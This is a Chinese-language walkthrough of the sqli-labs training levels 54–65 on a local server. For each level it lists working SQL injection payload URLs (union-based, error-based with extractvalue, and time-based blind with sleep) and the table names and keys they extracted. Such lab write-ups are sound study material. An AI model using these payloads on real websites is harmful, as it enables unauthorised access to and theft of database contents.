Sqli-labs Challenges(54-65)

Less-54:Challenge-1

页面的提示告诉我们要在查询10次以内取得key(临时生成的),10次后便会重置key,这就要求我们高效利用查询
已知库名为challenge,查表名

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20


得表名bj2h4jizgy,查列

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='bj2h4jizgy'--%20


查询所有数据,得key:uO2jP4KOXg2plHOs2U5srONh,提交即可

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_65KL,0x20,tryy),3 from bj2h4jizgy--%20

Less-55:Challenge-2

与54相同,只不过闭合方式变为了()形式
查表,得hyj1gftjil

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20

查列,得id,sessid,secret_DHWC,tryy

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='hyj1gftjil'--%20

查询所有数据,得key:2LEqYSvDkIbf5xU3Z1IidbET

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_DHWC,0x20,tryy),3 from hyj1gftjil--%20

Less-56:Challenge-3

与上面没区别,闭合方式变为(”)
直接上payload:

http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20
http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='v4v66ezujp'--%20
http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_Z71A,0x20,tryy),3 from v4v66ezujp--%20

key:cA8iROAUCkbAEgYyNBbeyiqP

Less-57:Challenge-4

同上,闭合方式改为双引号型
payload:

http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20
http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='yipmb5gy9w'--%20
http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_2Q8T,0x20,tryy),3 from yipmb5gy9w--%20

key:ei5Q8SV1dgN5rk9j2UnXtFma

Less-58:Challenge-5

从源码可以发现,页面根本没有回显数据库查询出来的数据

这时候需要通过报错回显了
报错注入
爆表名:cnpbo82z2k

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

爆列名:id,sessid,secret_Y7U3,tryy

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='cnpbo82z2k'),0x7e))--%20

得key:M4li6XN5AhP68HDC7VeLh522

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select secret_Y7U3 from cnpbo82z2k),0x7e))--%20

Less-59:Challenge-6

同理,只不过没有用单引号闭合
爆表名:kqp5l7l9qz

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

爆列名:id,sessid,secret_I6NF,tryy

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kqp5l7l9qz'),0x7e))--%20

得key:lqTDY68yGvkPqv2rmADA0G0h

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select secret_I6NF from kqp5l7l9qz),0x7e))--%20

Less-60:Challenge-7

同理,闭合方式变为(“”)
爆表名:nv3kb3qx97

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

爆列名:id,sessid,secret_8L1X,tryy

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='nv3kb3qx97'),0x7e))--%20

得key:pveMb7vSlXoJA8we9ONgYHj9

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select secret_8L1X from nv3kb3qx97),0x7e))--%20

Less-61:Challenge-8

同理,闭合方式变为((”))
爆表名:32dvo9vo5m

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

爆列名:id,sessid,secret_1HY8,tryy

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='32dvo9vo5m'),0x7e))--%20

得key:x4wbcyp16vSy8GJYvrMMC23T

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select secret_1HY8 from 32dvo9vo5m),0x7e))--%20

Less-62:Challenge-9

同理,闭合方式变为(”),当时此时报错注入已失效,运用延时注入
盲注出表名:xy9z8y4idj

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=120,0,sleep(5))--%20

盲注出列:secret_8UHY

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='xy9z8y4idj'),11,1))=115,0,sleep(5))--%20

盲注出key:Fo0om6HYYZmlvhagiSJ1GI2z

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select secret_8UHY from xy9z8y4idj),1,1))=70,0,sleep(5))--%20

Less-63:Challenge-10

同理less-62,闭合方式变为”
盲注出表名:oaa2n3tgkl

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=111,0,sleep(5))--%20

盲注出列:secret_7063

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oaa2n3tgkl'),11,1))=115,0,sleep(5))--%20

盲注出key:phYMsMewhxZaH62c4sGu2rzl

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select secret_7063 from oaa2n3tgkl),1,1))=112,0,sleep(5))--%20

Less-64:Challenge-11

同理less-62,闭合方式变为(())
盲注出表名:z7uakidqjr

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=122,0,sleep(5))--%20

盲注出列:secret_FW2T

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='z7uakidqjr'),11,1))=115,0,sleep(5))--%20

盲注出key:rDmvO277qpheigiMxCua2UUB

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select secret_FW2T from z7uakidqjr),1,1))=114,0,sleep(5))--%20

Less-65:Challenge-12

同理less-62,闭合方式变为(“”)
盲注出表名:48nvbr2bme

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52,0,sleep(5))--%20

盲注出列:secret_2VSI

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='48nvbr2bme'),11,1))=115,0,sleep(5))--%20

盲注出key:zVwn12yqWR2ORKplHmZozOzt

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select secret_2VSI from 48nvbr2bme),1,1))=122,0,sleep(5))--%20